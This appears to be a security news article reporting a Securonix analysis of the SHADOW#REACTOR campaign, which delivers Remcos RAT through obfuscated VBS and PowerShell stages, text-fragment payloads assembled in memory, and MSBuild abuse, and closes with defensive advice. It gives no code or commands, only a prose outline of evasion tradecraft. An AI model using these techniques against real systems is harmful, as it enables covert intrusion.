Ddos 
Security researchers have uncovered a sophisticated new malware framework that is slipping past enterprise defenses by hiding in plain sight. Dubbed SHADOW#REACTOR by the Securonix Threat Research team, this campaign employs a “tightly orchestrated” multi-stage attack to deploy the notorious Remcos RAT, all while leaving virtually no footprint on the victim’s hard drive.
The campaign marks a significant evolution in how cybercriminals are delivering commodity malware, moving away from traditional executable files to a complex assembly line of scripts and text fragments that are stitched together only in the system’s memory.
At the heart of SHADOW#REACTOR is a novel evasion technique: the use of “text-only intermediates.” Instead of downloading a malicious binary that antivirus software might flag, the malware retrieves harmless-looking text files—such as qpwoe32.txt or config.txt—which contain fragmented pieces of the payload.
“The infection chain follows a tightly orchestrated execution path: an obfuscated VBS launcher executed via wscript.exe invokes a PowerShell downloader, which retrieves fragmented, text-based payloads from a remote host”.
These fragments are useless on their own. However, once downloaded, the malware reconstructs them into encoded loaders. These are then “decoded in memory by a .NET Reactor-protected assembly, and used to fetch and apply a remote Remcos configuration”. This “fileless” approach ensures that the malicious code never touches the disk in a recognizable form, complicating forensic analysis and bypassing static detection engines.
The attackers are also abusing legitimate Windows tools to carry out their dirty work, a tactic known as “Living-off-the-Land” (LotL).
The analysis highlights that “the final stage leverages MSBuild.exe as a living-off-the-land binary (LOLBin) to complete execution, after which the Remcos RAT backdoor is fully deployed and takes control of the compromised system”.
By using trusted Microsoft binaries like wscript.exe and MSBuild.exe, the malware blends in with normal administrative activity, making it difficult for security teams to distinguish between a system update and a hostile takeover.
Despite the sophistication of the delivery mechanism, the targets appear to be random. The campaign avoids sector-specific lures in favor of a “spray-and-pray” approach.
“The absence of tailored decoys or sector-specific themes indicates a spray-and-pray approach aimed at scale rather than high-value targets”.
This broad targeting strategy suggests the operators are likely initial access brokers—criminals who breach networks not to steal data themselves, but to sell the “foothold” to ransomware gangs or other threat actors.
“From an attribution standpoint, the tooling and tradecraft are consistent with financially motivated operators, including potential initial access brokers”.
While the payload is the well-known, commercially available Remcos RAT, the architects behind SHADOW#REACTOR remain in the shadows.
“At present, there is insufficient evidence to attribute this activity to a known threat group or nation-state actor”.
The Securonix team concludes that “SHADOW#REACTOR is therefore best assessed as an unattributed, financially motivated loader framework designed to deliver Remcos RAT at scale while evading detection through in-memory execution and LOLBin abuse”.
Organizations are advised to monitor for unusual script execution and restrict the use of administrative tools like PowerShell and MSBuild to prevent this invisible assembly line from running on their networks.
Related Posts:
- Turla APT Suspected in “Tiny BackDoor” Campaign Leveraging MSBuild to Evade Detection
- Turla APT Group Unleashes Sophisticated Fileless Backdoor via Compromised Site
- New “CRON#TRAP” Campaign Exploits Emulated Linux Environments to Evade Detection
- Stealthy Remcos RAT Campaign Uses PowerShell to Evade Antivirus Detection
Donate